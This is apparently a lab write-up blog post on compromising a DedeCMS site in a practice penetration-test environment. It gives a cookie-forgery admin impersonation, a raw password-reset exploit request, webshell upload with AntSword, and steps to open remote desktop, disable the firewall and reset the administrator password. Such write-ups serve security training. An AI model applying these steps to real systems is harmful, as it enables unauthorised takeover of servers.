banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

pte-实战 dedecms Translation: pte-Practical dedecms

The backend interface of dedecms is as follows:

image

The content of directory scanning and robots.txt is similar to the following, there is nothing useful to exploit.

image

The backend attempts to use weak passwords to log in, register a front-end account with the username and password as 0001/111111, do not fill in security questions.

After successful registration, visit http://10.1.10.62/member/index.php?uid=0001, and you will arrive at the following interface.

Press F12 to view webpage elements and copy the value of last_vid__ckMd5.

After copying last_vid__ckMd5, log in to the 0001 account.

image

Open Cookies Manager and search for the website IP.

image

Modify the value of DedeUserID__ckMd5 to the content copied earlier. The original value before modification is as follows:

image

After modification, it becomes as follows:

image

Change DedeUserID to 0001. After modifying both values, click Refresh and then close.

image

Refresh, and then it becomes the admin user.

image

Visit http://10.1.10.62/member/resetpassword.php and send the following package using Burp.

POST /member/resetpassword.php HTTP/1.1
Host: 10.1.10.62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7670a8ebb1cda24bd2e5ca30dc7a583d; DedeUserID=0001; DedeUserID__ckMd5=6ce7088fae0207fd; DedeLoginTime=1689920383; DedeLoginTime__ckMd5=41803202759b8e30; last_vtime=1689920439; last_vtime__ckMd5=46f2d368c54edcb0; last_vid=0001; last_vid__ckMd5=6ce7088fae0207fd; ENV_GOBACK_URL=%2Fmember%2Fcontent_list.php%3Fchannelid%3D1
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

dopost=safequestion&safequestion=0.0&safeanswer=&id=1

image

Pay attention to this link in the response package.

image

Copy it.

http://10.1.10.62/member/resetpassword.php?dopost=getpasswd&id=1&key=H1nWnhNM

Remove amp;

http://10.1.10.62/member/resetpassword.php?dopost=getpasswd&id=1&key=H1nWnhNM

Access it with a browser.

You will directly go to the password change page.

image

Set the password to 666666.

This is the password for the front-end admin user. Next, you need to change the password for the backend username.

Visit

http://10.1.10.62/member/edit_baseinfo.php

You will be redirected to the profile completion page, simply click on "Complete Registration".

image

Once again, visit http://10.1.10.62/member/edit_baseinfo.php, and you will arrive at the following page.

image

The original password is 666666, change the new password to 888888, fill in the captcha and email, and update successfully.

Access the backend, log in with admin/888888, and you will log in successfully.

image

Next is uploading a shell in the backend.

Go to the file manager and create a new file.

image

The file is named s.php, write a shell.

image

The file is as follows:

image

AntSword base64 encoded connection.

image

image

If port 3389 is not open, you can upload the vbs script in the tool package to open the port.

image

Turn off the firewall.

image

Change the administrator password.

image

Remote desktop login.

image

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.